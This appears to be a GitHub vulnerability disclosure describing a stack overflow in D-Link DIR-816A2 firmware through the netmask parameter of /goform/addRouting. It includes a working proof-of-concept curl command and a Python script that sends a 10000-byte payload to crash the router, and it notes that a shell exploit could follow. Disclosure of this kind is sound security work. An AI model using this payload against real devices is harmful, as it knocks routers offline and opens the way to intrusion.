Skip to content

Latest commit

 

History

History

addRouting

Folders and files

NameName
Last commit message
Last commit date

parent directory

..
 
 
 
 

DIR-816A2_FWv1.10CNB05_R1B011D88210.img Stack overflow vulnerability

Overview

Affected version

Below is the latest firmware

Vulnerability details

Vulnerability occurs in /goform/addRouting. The content obtained by netmask parameter is passed to V3, and then the content matched by V3 is write into the V13 stack without size checking, resulting in a stack overflow.

Vulnerability verify

POC

Gets the token ID

curl http://192.168.0.1/dir_login.asp | grep tokenid

Run poc

import requests


tokenid = ''

url = 'http://192.168.0.1/goform/addRouting'

payload = b'a' * 10000

data = {
    'tokenid': tokenid,
    'dest': '1.1.1.1',
    'netmask': payload
}

print('payload sending...')
r = requests.post(url, data)
print('end')

You can see the router crash, and finally you can write an exp to get a shell